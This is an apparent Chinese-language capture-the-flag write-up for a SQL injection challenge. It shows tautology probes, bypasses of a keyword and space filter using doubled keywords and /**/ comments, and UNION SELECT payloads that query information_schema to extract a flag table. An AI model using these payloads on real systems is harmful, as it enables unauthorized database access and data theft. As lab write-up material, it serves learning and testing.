简单的注入测试
1 正常
1' 无回显
1' or '1'='1 全部数据
测试过滤:
union select
information_schema
information_schema.tables
information_schema.columns
table_schema
column_name
发现都被过滤了
重复输入union select后发现空格也被过滤了,用两个空格代替一个空格或用对注释符/**/绕过
1.查询当前数据库
1' unionunion selectselect database()' <两个空格>
1'/**/union/**/select/**/database()'
图片.png
2.查询数据库中的表
1' unionunion selectselect table_name fromfrom information_schema.tables wherewhere '1'='1 <两个空格>
1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
图片.png
发现flag表
3.查询flag表中字段名
1' unionunion selectselect column_namcolumn_namee fromfrom information_schema.coluinformation_schema.columnsmns wherewhere table_name='flag <两个空格>
图片.png
发现flag字段名
4.最后构造出poc
1' unionunion selectselect flag fromfrom flag wherewhere '1'='1
1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1
图片.png
网友评论